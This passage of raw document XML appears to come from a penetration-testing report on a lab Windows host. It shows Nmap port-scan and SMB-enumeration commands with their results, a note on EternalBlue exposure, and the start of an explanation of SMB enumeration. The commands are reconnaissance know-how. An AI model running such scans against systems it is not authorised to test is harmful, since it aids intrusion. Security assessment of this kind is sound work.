                <v:rect id="Rectangle 2066" style="position:absolute;width:932;height:1850;left:2050;top:322;"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2067" style="position:absolute;width:563;height:2260;left:2751;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068" style="position:absolute;width:33557;height:1843;left:4336;top:322;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve">Error: NT_STATUS_ACCESS_DENIED</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2069" style="position:absolute;width:506;height:2243;left:29577;top:21;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2070" style="position:absolute;width:506;height:2243;left:53114;top:31174;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 2075" style="position:absolute;width:52666;height:28822;left:142;top:3365;" filled="f">
                  <v:imagedata r:id="rId37"/>
                </v:shape>
                <v:shape id="Shape 2076" style="position:absolute;width:52952;height:29108;left:0;top:3221;" coordsize="5295265,2910840" path="m0,2910840l5295265,2910840l5295265,0l0,0x">
                  <v:stroke weight="2.25pt" endcap="flat" joinstyle="round" on="true" color="#ff0000"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="55251603" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="180" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACA57E5" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9AA7C3" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="180" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:hanging="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap SYN Scan </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B22A6D4" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="212"/>
        <w:ind w:right="147"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A comprehensive TCP SYN scan was conducted on the target 192.168.240.129 using Nmap. The scan revealed several open ports running critical services. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B66D554" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="8" w:line="454" w:lineRule="auto"/>
        <w:ind w:right="5879"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Command Used: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p- 192.168.240.129 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7312C7D6" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="227" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Result: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32895228" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="235"/>
        <w:ind w:right="147"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As shown below, the following key ports were found to be open: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59219448" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>21/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (FTP) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7842807E" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>135/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (MSRPC) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A486905" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>139/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (NetBIOS-SSN) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F1B969" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>445/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (Microsoft-DS) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7262CDC1" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>1025–1029/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (RPC Services) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537C526F" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>5357/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wsdapi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637346C3" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="246"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>8080/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (HTTP-Proxy) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586E89E5" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="397" w:lineRule="auto"/>
        <w:ind w:right="147"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">These services indicate potential vulnerabilities, especially the presence of SMB (port 445), which is known to be exploitable through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (MS17-010) on unpatched systems. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ACF4FA" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="214" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AD24265" wp14:editId="3F49D603">
                <wp:extent cx="5373065" cy="3236240"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="20970" name="Group 20970"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5373065" cy="3236240"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5373065" cy="3236240"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2172" name="Rectangle 2172"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5334965" y="2794737"/>
                            <a:ext cx="50673" cy="224380"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3DAE5D9B"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73" name="Rectangle 2173"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="3067533"/>
                            <a:ext cx="50673" cy="224380"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5F621935"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77" name="Picture 2177"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId38"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="37795" y="14351"/>
                            <a:ext cx="5266690" cy="2882265"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="2178" name="Shape 2178"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="23508" y="0"/>
                            <a:ext cx="5295265" cy="2910840"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5295265" h="2910840">
                                <a:moveTo>
                                  <a:pt x="0" y="2910840"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5295265" y="2910840"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="529526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970" style="width:423.076pt;height:254.822pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="53730,32362">
                <v:rect id="Rectangle 2172" style="position:absolute;width:506;height:2243;left:53349;top:27947;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2173" style="position:absolute;width:506;height:2243;left:0;top:30675;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 2177" style="position:absolute;width:52666;height:28822;left:377;top:143;" filled="f">
                  <v:imagedata r:id="rId39"/>
                </v:shape>
                <v:shape id="Shape 2178" style="position:absolute;width:52952;height:29108;left:235;top:0;" coordsize="5295265,2910840" path="m0,2910840l5295265,2910840l5295265,0l0,0x">
                  <v:stroke weight="2.25pt" endcap="flat" joinstyle="round" on="true" color="#ff0000"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3EEC0B" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F237F1" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="180" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">4. SMB Enumeration with Nmap Scripts </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3458D924" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="212"/>
        <w:ind w:right="147"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To gather more information about the SMB service, an Nmap script scan was executed using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>enum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-shares and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>enum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-users. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8F0395" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="458" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="1815"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Command Used: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>enum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>shares,smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>enum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-users -p445 192.168.240.129 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Result: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C894C3D" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="234"/>
        <w:ind w:right="147"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As shown below, the scan failed to enumerate administrative shares due to access restrictions (NT_STATUS_ACCESS_DENIED). However, it did confirm: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3E8338" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="43" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="713" w:right="74" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Anonymous Access</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to IPC$ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3CEAFD" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="173"/>
        <w:ind w:left="713" w:right="74" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>READ permissions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> granted to anonymous users on IPC$ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0FB842" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="147"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This level of access, while limited, may allow further enumeration or potential exploitation. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251CBFB4" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="162" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="37" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EA40935" wp14:editId="4602011B">
                <wp:extent cx="5349558" cy="2963698"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="21399" name="Group 21399"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5349558" cy="2963698"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5349558" cy="2963698"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2285" name="Rectangle 2285"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5311458" y="2794992"/>
                            <a:ext cx="50673" cy="224379"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7F20EB8D"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89" name="Picture 2289"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId37"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="14288" y="14224"/>
                            <a:ext cx="5266690" cy="2882265"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="2290" name="Shape 2290"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5295265" cy="2910840"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5295265" h="2910840">
                                <a:moveTo>
                                  <a:pt x="0" y="2910840"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5295265" y="2910840"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="529526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99" style="width:421.225pt;height:233.362pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="53495,29636">
                <v:rect id="Rectangle 2285" style="position:absolute;width:506;height:2243;left:53114;top:27949;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 2289" style="position:absolute;width:52666;height:28822;left:142;top:142;" filled="f">
                  <v:imagedata r:id="rId37"/>
                </v:shape>
                <v:shape id="Shape 2290" style="position:absolute;width:52952;height:29108;left:0;top:0;" coordsize="5295265,2910840" path="m0,2910840l5295265,2910840l5295265,0l0,0x">
                  <v:stroke weight="2.25pt" endcap="flat" joinstyle="round" on="true" color="#ff0000"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF31C74" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B977398" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="108"/>
        <w:ind w:left="-5" w:right="2290"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc23327"/>
      <w:r>
        <w:t xml:space="preserve">2.3.2 Selected Critical Vulnerability: SMB Enumeration </w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="3C3A65CF" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="108" w:line="402" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="2290"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Why Does SMB Enumeration Exist? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27609D01" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="184" w:line="397" w:lineRule="auto"/>
        <w:ind w:right="147"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SMB enumeration is one of the mechanisms proposed by SMB for enabling files, printers, and resources sharing between devices on a Windows network. It allows systems to query: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4073EAEE" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="142"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="172B4D"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lShared</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> folders and drives </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0895D0" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="129"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">l </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> accounts </w:t>
      </w:r>
    </w:p>
